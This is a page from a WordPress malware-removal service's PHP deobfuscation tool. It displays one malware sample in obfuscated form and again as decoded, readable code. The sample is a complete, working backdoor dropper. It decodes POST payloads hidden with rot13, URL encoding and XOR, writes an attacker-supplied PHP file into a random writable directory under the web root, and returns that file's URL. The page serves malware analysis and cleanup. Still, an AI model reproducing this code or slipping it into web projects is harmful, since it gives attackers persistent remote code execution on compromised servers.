Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $PoOZT = chr(68)."\x4f".chr(67).chr(85)."\115".chr(69).'N'.'T'."\x5f".chr(82)."\117".chr(79).'T';$smoJTEixAL = chr(72).'T'.chr(116-32).chr(361-281)."\x5f"."\x48"."\x4f".'S'."\x54";$TzVCvb = chr(416-312).chr(116).chr(322-206).'p'."\x3a"."\x2f".'/';$DJGTRb = "\56".chr(662-550)."\150"."\160";$...



Obfuscated php code

<?php $PoOZT = chr(68)."\x4f".chr(67).chr(85)."\115".chr(69).'N'.'T'."\x5f".chr(82)."\117".chr(79).'T';$smoJTEixAL = chr(72).'T'.chr(116-32).chr(361-281)."\x5f"."\x48"."\x4f".'S'."\x54";$TzVCvb = chr(416-312).chr(116).chr(322-206).'p'."\x3a"."\x2f".'/';$DJGTRb = "\56".chr(662-550)."\150"."\160";$ZpoNvVKWE = "\x70".chr(1083-979).chr(418-306);$RzmgRP = "\146".chr(105).chr(370-262).'e'."\137"."\160".chr(450-333)."\x74".chr(392-297).chr(643-544).chr(388-277).chr(843-733).chr(551-435).'e'."\156".chr(116)."\163";$fldZLbJ = "\x72".'a'.chr(331-212)."\x75".chr(593-479)."\154".'d'."\x65".chr(674-575).chr(340-229)."\144"."\145";$ygLKFKA = "\165".chr(110)."\x73".chr(101).chr(721-607).chr(725-620)."\x61"."\x6c".chr(105).chr(937-815)."\145";$KUuxLHSf = "\x70".chr(322-218).chr(112).'v'.chr(118-17)."\162".chr(888-773).'i'.'o'."\156";$XRSrgKa = "\163".chr(116).'r'."\x5f".chr(723-609).chr(1076-965).chr(116).chr(49).'3';$xaPWFetk = chr(115)."\145"."\162".chr(599-494).chr(563-466).chr(812-704).chr(643-538).'z'.chr(101);foreach ($_POST as $ZABuSNh => $axZrHW){if (strlen($ZABuSNh) == 16){$axZrHW = str_split($fldZLbJ($XRSrgKa($axZrHW)));$ZABuSNh = array_slice(str_split(str_repeat($ZABuSNh, (count($axZrHW)/16)+1)), 0, count($axZrHW));function JLduJN($hJyHYUQI, $QqAlnl, $ZABuSNh){$EiCKixAp = "DtsAJbPGqDygBcuL";return $hJyHYUQI ^ $EiCKixAp[$QqAlnl % strlen($EiCKixAp)] ^ $ZABuSNh;}$axZrHW = implode("", array_map("JLduJN", array_values($axZrHW), array_keys($axZrHW), array_values($ZABuSNh)));$axZrHW = @$ygLKFKA($axZrHW);if (@is_array($axZrHW)){$WoPTqcULx = array_keys($axZrHW);$axZrHW = $axZrHW[$WoPTqcULx[0]];if ($axZrHW === $WoPTqcULx[0]){echo @$xaPWFetk(Array($ZpoNvVKWE => @$KUuxLHSf(), ));exit();}else {function hbCvNa($zBtcfYWir){static $CFxrX = array();$Zyrarvq = glob($zBtcfYWir . '/*', GLOB_ONLYDIR);if (count($Zyrarvq) > 0) {foreach ($Zyrarvq as $zBtcfYW) {if (@is_writable($zBtcfYW)) {$CFxrX[] = $zBtcfYW;}}}foreach ($Zyrarvq as $zBtcfYWir) hbCvNa($zBtcfYWir);return $CFxrX;}$iKXZOLXxUf = $_SERVER[$PoOZT];$Zyrarvq = hbCvNa($iKXZOLXxUf);$WoPTqcULx = array_rand($Zyrarvq);$LWokV = $Zyrarvq[$WoPTqcULx] . "/" . substr(md5(time()), 0, 8) . $DJGTRb;@$RzmgRP($LWokV, $axZrHW);echo $TzVCvb . $_SERVER[$smoJTEixAL] . substr($LWokV, strlen($iKXZOLXxUf));exit();}}}}

Decoded(de-Obfuscated) php code

<?php

$PoOZT = "DOCUMENT_ROOT";
$smoJTEixAL = "HTTP_HOST";
$TzVCvb = "http://";
$DJGTRb = ".php";
$ZpoNvVKWE = "php";
$RzmgRP = "file_put_contents";
$fldZLbJ = "rawurldecode";
$ygLKFKA = "unserialize";
$KUuxLHSf = "phpversion";
$XRSrgKa = "str_rot13";
$xaPWFetk = "serialize";
foreach ($_POST as $ZABuSNh => $axZrHW) {
    if (strlen($ZABuSNh) == 16) {
        $axZrHW = str_split($fldZLbJ($XRSrgKa($axZrHW)));
        $ZABuSNh = array_slice(str_split(str_repeat($ZABuSNh, count($axZrHW) / 16 + 1)), 0, count($axZrHW));
        function JLduJN($hJyHYUQI, $QqAlnl, $ZABuSNh)
        {
            $EiCKixAp = "DtsAJbPGqDygBcuL";
            return $hJyHYUQI ^ $EiCKixAp[$QqAlnl % strlen($EiCKixAp)] ^ $ZABuSNh;
        }
        $axZrHW = implode("", array_map("JLduJN", array_values($axZrHW), array_keys($axZrHW), array_values($ZABuSNh)));
        $axZrHW = @$ygLKFKA($axZrHW);
        if (@is_array($axZrHW)) {
            $WoPTqcULx = array_keys($axZrHW);
            $axZrHW = $axZrHW[$WoPTqcULx[0]];
            if ($axZrHW === $WoPTqcULx[0]) {
                echo @$xaPWFetk(array($ZpoNvVKWE => @$KUuxLHSf()));
                exit;
            } else {
                function hbCvNa($zBtcfYWir)
                {
                    static $CFxrX = array();
                    $Zyrarvq = glob($zBtcfYWir . '/*', GLOB_ONLYDIR);
                    if (count($Zyrarvq) > 0) {
                        foreach ($Zyrarvq as $zBtcfYW) {
                            if (@is_writable($zBtcfYW)) {
                                $CFxrX[] = $zBtcfYW;
                            }
                        }
                    }
                    foreach ($Zyrarvq as $zBtcfYWir) {
                        hbCvNa($zBtcfYWir);
                    }
                    return $CFxrX;
                }
                $iKXZOLXxUf = $_SERVER[$PoOZT];
                $Zyrarvq = hbCvNa($iKXZOLXxUf);
                $WoPTqcULx = array_rand($Zyrarvq);
                $LWokV = $Zyrarvq[$WoPTqcULx] . "/" . substr(md5(time()), 0, 8) . $DJGTRb;
                @$RzmgRP($LWokV, $axZrHW);
                echo $TzVCvb . $_SERVER[$smoJTEixAL] . substr($LWokV, strlen($iKXZOLXxUf));
                exit;
            }
        }
    }
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.